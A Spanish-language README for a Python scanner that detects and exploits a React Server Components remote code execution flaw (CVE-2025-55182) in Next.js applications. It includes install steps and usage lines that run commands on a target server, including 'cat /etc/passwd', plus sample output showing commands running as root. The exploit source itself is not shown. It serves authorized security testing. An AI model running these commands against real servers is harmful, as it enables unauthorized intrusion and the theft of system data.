
Un escáner de seguridad basado en Python para detectar y explotar vulnerabilidades de **React Server Components (RSC)** en aplicaciones Next.js. Esta herramienta realiza detección pasiva, fingerprinting activo y pruebas de explotación de RCE.
Un escáner de seguridad basado en Python para detectar y explotar vulnerabilidades de React Server Components (RSC) en aplicaciones Next.js. Esta herramienta realiza detección pasiva, fingerprinting activo y pruebas de explotación RCE.
⚠️ ADVERTENCIA: Esta herramienta es solo para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Obtenga siempre permiso por escrito antes de realizar pruebas.
✅ Detección Pasiva - Analiza HTML, cabeceras y estructura de la página en busca de indicadores RSC
✅ Fingerprinting Activo - Envía cabeceras específicas de RSC para detectar respuestas del servidor
✅ Análisis de Cabeceras HTTP - Identifica cabeceras relacionadas con Next.js y RSC
✅ Explotación RCE - Ejecuta comandos en servidores vulnerables (si es explotable)
✅ Salida de Terminal en Color - Retroalimentación visual mejorada para una mayor legibilidad
✅ Modo Interactivo - Ejecuta múltiples comandos en modo de explotación
✅ Decodificación Robusta - Maneja payloads comprimidos con gzip y binarios
Clonar el repositorio
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
Instalar dependencias
pip install -r requirements.txt
Paquetes requeridos:
requests>=2.28.0 - Biblioteca cliente HTTPurllib3>=1.26.0 - Utilidades HTTP avanzadascolorama>=0.4.6 - Colores de terminal (compatible con Windows)beautifulsoup4 - Análisis de HTMLpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
Luego introduzca comandos en el prompt (escriba quit para salir).
| Opción | Descripción |
|---|---|
<URL> | URL objetivo (obligatoria). Añade automáticamente https:// si falta |
--exploit | Habilita la explotación RCE después de la detección |
--cmd <command> | Ejecuta un comando específico (usar con --exploit) |
Detectar vulnerabilidad RSC:
python rsc_detector.py https://target.com
Explotar y ejecutar el comando id:
python rsc_detector.py https://target.com --exploit --cmd "id"
Explotar y ejecutar cat /etc/passwd:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
Modo interactivo (múltiples comandos):
python rsc_detector.py https://target.com --exploit
window.__next_f (App Router de Next.js)text/x-component__NEXT_DATA__ y las importaciones de Next.jsServer, Vary y X-Nextjs-CacheRSC: 1[*] Starting RSC Detection Scan on: https://example.com
====================================================================
[1] Running Passive Scan...
Status: DETECTED
Score: 80/100
- Found: window.__next_f (App Router)
[2] Analyzing Headers...
- Vary header includes RSC: ...
[3] Running Active Fingerprint...
Status: DETECTED
- Response Content-Type became text/x-component
- Vary header contains 'RSC'
====================================================================
[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
Consider: RCE exploitation may be possible
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
CVE-2025-55182 explota:
child_process.execSync()Esta herramienta es ESTRICTAMENTE PARA PRUEBAS DE SEGURIDAD AUTORIZADAS ÚNICAMENTE:
El acceso no autorizado a sistemas informáticos es ilegal según:
Si descubre una vulnerabilidad usando esta herramienta:
La herramienta ignora la verificación SSL por defecto. Para habilitar la verificación:
detector = RSCDetector(url, verify_ssl=True)
La herramienta automáticamente:
Aumente el tiempo de espera en el código:
response = self.session.get(self.url, timeout=30) # 30 seconds
CVE-2025-55182/
├── README.md # This file
├── requirements.txt # Python dependencies
├── rsc_detector.py # Main scanner & exploit engine
├── rsc_cli.py # CLI utilities (if present)
├── script.py # Additional scripts (if present)
├── COLOR_GUIDE.md # Color output documentation
└── .gitignore # Git ignore rules
requests>=2.28.0 # HTTP requests
urllib3>=1.26.0 # Advanced HTTP
beautifulsoup4>=4.11.0 # HTML parsing
colorama>=0.4.6 # Terminal colors (Windows)
Instalar todo de una vez:
pip install -r requirements.txt